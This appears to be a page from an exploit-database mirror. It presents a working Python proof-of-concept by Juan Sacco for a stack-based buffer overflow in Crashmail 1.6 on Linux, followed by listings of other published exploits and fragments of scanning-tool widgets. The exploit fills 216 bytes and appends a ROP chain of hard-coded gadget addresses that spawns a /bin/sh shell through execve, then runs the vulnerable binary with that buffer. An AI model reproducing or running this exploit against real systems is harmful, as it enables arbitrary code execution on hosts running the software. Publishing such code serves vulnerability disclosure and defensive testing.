Menu

Search for hundreds of thousands of exploits

"Crashmail 1.6 - Stack-Based Buffer Overflow (ROP)"

Author

Exploit author

"Juan Sacco"

Platform

Exploit platform

linux

Release date

Exploit published date

2018-03-23

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
# Exploit author: Juan Sacco <jsacco@exploitpack.com>
# Website: http://exploitpack.com
#
# Description: Crashmail is prone to a stack-based buffer overflow because the application fails to perform adequate boundary checks on user supplied input.
# Impact: An attacker could exploit this vulnerability to execute arbitrary code in the context of the application. Failed exploit attempts may result in a denial-of-service condition.
# Vendor homepage: http://ftnapps.sourceforge.net/crashmail.html
# Affected version: 1.6 ( Latest )

import os, subprocess
from struct import pack

p = lambda x : pack('I', x)
IMAGE_BASE_0 = 0x08048000 # ./crashmail
rebase_0 = lambda x : p(x + IMAGE_BASE_0)

# Control of EIP at 216
# ROP chain: execve ( binsh )
# Static-linked
junk = 'A'*216 # Fill
ropchain = rebase_0(0x0002ecdf) # 0x08076cdf: pop eax; ret;
ropchain += '//bi'
ropchain += rebase_0(0x000705aa) # 0x080b85aa: pop edx; ret;
ropchain += rebase_0(0x000e9060)
ropchain += rebase_0(0x0002b42d) # 0x0807342d: mov dword ptr [edx], eax; ret;
ropchain += rebase_0(0x0002ecdf) # 0x08076cdf: pop eax; ret;
ropchain += 'n/sh'
ropchain += rebase_0(0x000705aa) # 0x080b85aa: pop edx; ret;
ropchain += rebase_0(0x000e9064)
ropchain += rebase_0(0x0002b42d) # 0x0807342d: mov dword ptr [edx], eax; ret;
ropchain += rebase_0(0x000391a0) # 0x080811a0: xor eax, eax; ret;
ropchain += rebase_0(0x000705aa) # 0x080b85aa: pop edx; ret;
ropchain += rebase_0(0x000e9068)
ropchain += rebase_0(0x0002b42d) # 0x0807342d: mov dword ptr [edx], eax; ret;
ropchain += rebase_0(0x000001f9) # 0x080481f9: pop ebx; ret;
ropchain += rebase_0(0x000e9060)
ropchain += rebase_0(0x000e0e80) # 0x08128e80: pop ecx; push cs; adc
al, 0x41; ret;
ropchain += rebase_0(0x000e9068)
ropchain += rebase_0(0x000705aa) # 0x080b85aaop edx; ret;
ropchain += rebase_0(0x000e9068)
ropchain += rebase_0(0x0002ecdf) # 0x08076cdf: pop eax; ret;
ropchain += p(0xfffffff5)
ropchain += rebase_0(0x00051dc7) # 0x08099dc7: neg eax; ret;
ropchain += rebase_0(0x00070e80) # 0x080b8e80: int 0x80; ret;
evil_buffer = junk + ropchain

print "[*] Exploit Pack http://exploitpack.com - Author: jsacco@exploitpack.com"
print "[*] Crashmail 1.6 - BoF ( ROP execve)"
print "[?] Payload can be read trough a file or STDIN"

try:
    subprocess.call(["./crashmail","SETTINGS", evil_buffer])
except OSError as e:
    if e.errno == os.errno.ENOENT:
        print "[!] Crashmail not found"
    else:
        print "[*] Error executing exploit"
    raise
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-11-27 "libupnp 1.6.18 - Stack-based buffer overflow (DoS)" dos linux "Patrik Lantz"
2020-11-24 "ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)" webapps linux "Giuseppe Fuggiano"
2020-10-28 "aptdaemon < 1.1.1 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "Blueman < 2.1.4 - Local Privilege Escalation" local linux "Vaisha Bernard"
2020-10-28 "PackageKit < 1.1.13 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion" webapps linux "Ivo Palazzolo"
2020-09-11 "Gnome Fonts Viewer 3.34.0 - Heap Corruption" local linux "Cody Winkler"
2020-07-10 "Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution" remote linux SpicyItalian
2020-07-06 "Grafana 7.0.1 - Denial of Service (PoC)" dos linux mostwanted002
Release Date Title Type Platform Author
2019-06-17 "Netperf 2.6.0 - Stack-Based Buffer Overflow" dos linux "Juan Sacco"
2018-08-29 "SIPP 3.3 - Stack-Based Buffer Overflow" local linux "Juan Sacco"
2018-05-16 "WhatsApp 2.18.31 - Memory Corruption" dos ios "Juan Sacco"
2018-04-24 "Kaspersky KSN for Linux 5.2 - Memory Corruption" dos linux "Juan Sacco"
2018-04-09 "PMS 0.42 - Local Stack-Based Overflow (ROP)" local linux "Juan Sacco"
2018-03-23 "Crashmail 1.6 - Stack-Based Buffer Overflow (ROP)" local linux "Juan Sacco"
2018-03-12 "SC 7.16 - Stack-Based Buffer Overflow" local linux "Juan Sacco"
2018-02-21 "EChat Server 3.1 - 'CHAT.ghp' Buffer Overflow" remote windows "Juan Sacco"
2018-02-07 "Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption" dos multiple "Juan Sacco"
2018-02-05 "BOCHS 2.6-5 - Local Buffer Overflow" local linux "Juan Sacco"
2017-11-01 "WhatsApp 2.17.52 - Memory Corruption" dos ios "Juan Sacco"
2017-07-24 "MAWK 1.3.3-17 - Local Buffer Overflow" local linux "Juan Sacco"
2017-06-28 "Flat Assembler 1.7.21 - Local Buffer Overflow" local linux "Juan Sacco"
2017-06-26 "JAD Java Decompiler 1.5.8e - Local Buffer Overflow (NX Enabled)" local linux "Juan Sacco"
2017-06-09 "Mapscrn 2.03 - Local Buffer Overflow (PoC)" dos linux "Juan Sacco"
2017-05-30 "TiEmu 2.08 - Local Buffer Overflow" local windows "Juan Sacco"
2017-05-26 "JAD Java Decompiler 1.5.8e - Local Buffer Overflow" local linux "Juan Sacco"
2017-05-10 "Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)" remote windows_x86-64 "Juan Sacco"
2017-01-16 "iSelect v1.4 - Local Buffer Overflow" local linux "Juan Sacco"
2016-10-27 "GNU GTypist 2.9.5-2 - Local Buffer Overflow" local linux "Juan Sacco"
2016-09-19 "EKG Gadu 1.9~pre+r2855-3+b1 - Local Buffer Overflow" local linux "Juan Sacco"
2016-08-05 "zFTP Client 20061220 - 'Connection Name' Local Buffer Overflow" local linux "Juan Sacco"
2016-06-27 "HNB 1.9.18-10 - Local Buffer Overflow" local linux "Juan Sacco"
2016-06-27 "PInfo 0.6.9-5.1 - Local Buffer Overflow" local linux "Juan Sacco"
2016-05-13 "NRSS Reader 0.3.9 - Local Stack Overflow" local linux "Juan Sacco"
2016-05-04 "TRN Threaded USENET News Reader 3.6-23 - Local Stack Overflow" local linux "Juan Sacco"
2016-04-26 "Yasr Screen Reader 0.6.9 - Local Buffer Overflow" local linux "Juan Sacco"
2016-04-13 "Texas Instrument Emulator 3.03 - Local Buffer Overflow" local linux "Juan Sacco"
2016-04-07 "Mess Emulator 0.154-3.1 - Local Buffer Overflow" local linux "Juan Sacco"
2016-02-03 "yTree 1.94-1.1 - Local Buffer Overflow (PoC)" dos linux "Juan Sacco" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected